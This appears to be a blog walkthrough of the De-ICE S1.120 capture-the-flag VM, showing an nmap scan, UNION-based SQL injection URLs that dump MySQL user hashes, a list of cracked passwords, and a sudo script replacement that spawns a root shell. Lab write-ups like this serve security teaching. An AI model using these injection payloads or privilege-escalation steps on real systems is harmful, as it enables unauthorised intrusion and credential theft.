Mr_H4sh

Infosec, CTF and more

De-ICE S1.120 Solution

In this post I’m going to show you how to solve the De-ICE VM 1.120 provided by Hacking Dojo Team.

You can find the VM on this link

The goal of the VM is to gain root access to the machine.

The VM has DHCP enabled, although it’ll will take the IP address 192.168.1.120, so make sure that you have setup a network with range 192.168.1.x.

Attacker: 192.168.1.1
Victim: 192.168.1.120

I run nmap against the victim, and this is what I get:

# Nmap 7.01 scan initiated Tue Mar 21 04:58:09 2017 as: nmap -sS -sV -p- -Pn -n -v -oA nmap_syn_version_full_192.168.1.120 -T5 192.168.1.120
Warning: 192.168.1.120 giving up on port because retransmission cap hit (2).
Increasing send delay for 192.168.1.120 from 0 to 5 due to 2996 out of 7489 dropped probes since last increase.
Nmap scan report for 192.168.1.120
Host is up (0.00024s latency).
Not shown: 65521 closed ports
PORT      STATE    SERVICE  VERSION
21/tcp    open     ftp      ProFTPD 1.3.2
22/tcp    open     ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp    open     http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp   open     ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp  open     mysql    MySQL (unauthorized)
11123/tcp filtered unknown
19591/tcp filtered unknown
22721/tcp filtered unknown
25538/tcp filtered unknown
33762/tcp filtered unknown
35385/tcp filtered unknown
37809/tcp filtered unknown
44970/tcp filtered unknown
53545/tcp filtered unknown
MAC Address: 00:0C:29:E5:A2:C8 (VMware)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 05:09:15 2017 -- 1 IP address (1 host up) scanned in 666.53 seconds

I open the URL http://192.168.1.120/ in a browser, and I find a small CMS. I add a product through the URL http://192.168.1.120/add_product.php and then I go to http://192.168.1.120/products.php?id=1 to see my product.

I see that the id parameter in querystring suffers of SQL Injection:

http://192.168.1.120/products.php?id=1%20ORDER%20BY%205# => returns the product
http://192.168.1.120/products.php?id=1%20ORDER%20BY%205# => doesn't return anything
http://192.168.1.120/products.php?id=1%20OR%201=1# => returns the product
http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,2,3,4,5# => we see that the shown fields are the 2,3 and 4

At this point I go ahead and check if there’s any useful information in the database:

http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,version(),user(),database(),5# => returns the following:

Product: 5.1.33

Desription: webapp@localhost

Price: $merch

Using the same method, I see that the user webapp allows the access to the mysql database, allowing access to the user table. This way, I fetch the passwords for each user in the database:

http://192.168.1.120/products.php?id=1%20UNION%20SELECT%201,user,password,4,5%20FROM%20mysql.user# => returns the following output:

Product: swarren

Desription: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC

Price: $4.00

Product: ktso

Desription: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4

Price: $4.00

Product: jayala

Desription: *79BF466BCC601BD91A0897BB162421F9BA8C29CA

Price: $4.00

Product: amaynard

Desription: *F491287896471CB21030790BF46865C4A39DE651

Price: $4.00

Product: jbresnahan

Desription: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2

Price: $4.00

Product: myajima

Desription: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

Price: $4.00

Product: jfranklin

Desription: *D6B63C1953E7F096DB307F8AC48C4AD703E57001

Price: $4.00

Product: mnader

Desription: *46CFC7938B60837F46B610A2D10C248874555C14

Price: $4.00

Product: aharp

Desription: *00A51F3F48415C7D4E8908980D443C29C69B60C9

Price: $4.00

Product: bbanter

Desription: *F8E113FD51D520075836A4B815568BA2B96F7C30

Price: $4.00

Product: aard

Desription: *FCAAF3F0BD94C027B2769A95903C355CE6294660

Price: $4.00

Product: strammel

Desription: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8

Price: $4.00

Product: dgilfillan

Desription: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5

Price: $4.00

Product: dgrant

Desription: *3EEB06BE54EABF909DC8F6107110777F1DE43186

Price: $4.00

Product: aheflin

Desription: *6691484EA6B50DDDE1926A220DA01FA9E575C18A

Price: $4.00

Product: hlovell

Desription: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0

Price: $4.00

Product: mholland

Desription: *A4B6157319038724E3560894F7F932C8886EBFCF

Price: $4.00

Product: lmorales

Desription: *94F3DC3F398B76269CAAD51627279D4233A6C89A

Price: $4.00

Product: dwestling

Desription: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

Price: $4.00

Product: bwatkins

Desription: *B12289EEF8752AD620294A64A37CD586223AB454

Price: $4.00

Product: jduff

Desription: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594

Price: $4.00

Product: aweiland

Desription: *90837F291B744BBE86DF95A37D2B2524185DBBF5

Price: $4.00

Product: qpowers

Desription: *D183105443FBDE597607B8BC5475A9E1B7847F3E

Price: $4.00

Product: jalvarez

Desription: *81101DED975D54BD76A3C8EAD293597AE9BB143F

Price: $4.00

Product: aadams

Desription: *B021918A5DCA54916CF724573179571DFC37AC88

Price: $4.00

Product: tgoodchap

Desription: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC

Price: $4.00

Product: lmartinez

Desription: *626AC8265C7D53693CB7478376CE1B4825DFF286

Price: $4.00

Product: rdominguez

Desription: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E

Price: $4.00

Product: krenfro

Desription: *A5892368AE83685440A1E27D012306B073BDF5B7

Price: $4.00

Product: aallen

Desription: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1

Price: $4.00

Product: jalcantar

Desription: *24B8599BAF46DD4B4D8DB50A3B10136457492622

Price: $4.00

Product: dtraylor

Desription: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41

Price: $4.00

Product: rpatel

Desription: *CFBF459D9D6057BC2A85477A38327B96F06B1597

Price: $4.00

Product: tdeleon

Desription: *797420C584EBF42750EB523104268BA0FD87FBC8

Price: $4.00

Product: djohnson

Desription: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1

Price: $4.00

Product: sjohnson

Desription: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9

Price: $4.00

Product: jdavenport

Desription: *61305383748FBEAB119F9A8BC35EBBADB4889A9D

Price: $4.00

Product: sgains

Desription: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7

Price: $4.00

Product: mrodriguez

Desription: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

Price: $4.00

Product: mbryan

Desription: *7B2F14D9BB629E334CD49A1028BD85750F7D3530

Price: $4.00

Product: kwebber

Desription: *FD571203974BA9AFE270FE62151AE967ECA5E0AA

Price: $4.00

Product: cchisholm

Desription: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC

Price: $4.00

Product: bphillips

Desription: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91

Price: $4.00

Product: kclemons

Desription: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004

Price: $4.00

Product: dcooper

Desription: *51AA306E66303073DBA15D2750E23C90C7A7F947

Price: $4.00

Product: rjacobson

Desription: *2CE4701D02A76C12CD513109CA16967A68B4C23A

Price: $4.00

Product: aspears

Desription: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00

Price: $4.00

Product: ccoffee

Desription: *AA1420F182E88B9E5F874F6FBE7459291E8F4601

Price: $4.00

Product: dstevens

Desription: *446525BB82B5E22BD9E525261D37C494F623C52B

Price: $4.00

Product: webapp

Desription: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F

Price: $4.00

Quite a few users and passwords. I crack the passwords with john, and this is what I get:

root@kali:~/Desktop/lab/de-ice-1-120# cat passwords.txt 
password         (mrodriguez)
12345678         (djohnson)
computer         (jalvarez)
qwerty           (ccoffee)
internet         (tdeleon)
shadow           (mbryan)
baseball         (dcooper)
letmein          (kclemons)
jordan           (tgoodchap)
michael          (aspears)
soccer           (lmorales)
iloveyou         (rpatel)
jennifer         (aadams)
master           (dtraylor)
monkey           (krenfro)
pepper           (lmartinez)
whatever         (aweiland)
111111           (kwebber)
666666           (cchisholm)
princess         (rjacobson)
superman         (rdominguez)
123123           (aallen)
cheese           (sgains)
starwars         (jalcantar)
Password         (jduff)
nintendo         (sjohnson)
blahblah         (dstevens)
passw0rd         (dwestling)
0                (bwatkins)
babyl0n          (jdavenport)
gizmodo          (qpowers)
consumer         (bphillips)

All the users can login to the system. I login with most of them to see if there’s any root user or has something interesting.

Of all the users, the user ccoffee has a script with SUID bit in /home/ccoffee/scripts/getlogs.sh.

Also, he can run as sudo the same script:

ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

This is a good opportunity to change the content of getlogs.sh, although it’s not so straightforward.

I move the getlogs.sh to getlogs.sh.old, and then create a getlogs.sh file with some python code to spawn a shell. Since the script can be run as sudo, the spawned shell will be with root user:

ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ ls -l
total 4
-rws--x--x 1 root admin 110 Mar 21 04:55 getlogs.sh.old*
ccoffee@slax:~/scripts$ echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'" > getlogs.sh
ccoffee@slax:~/scripts$ cat getlogs.sh
cat getlogs.sh
python -c 'import pty;pty.spawn("/bin/bash")'
ccoffee@slax:~/scripts$ chmod +x getlogs.sh
ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
bash-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev)
bash-3.1# 

This is it, root privileges gained.

Thank you to HackingDojo Team for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.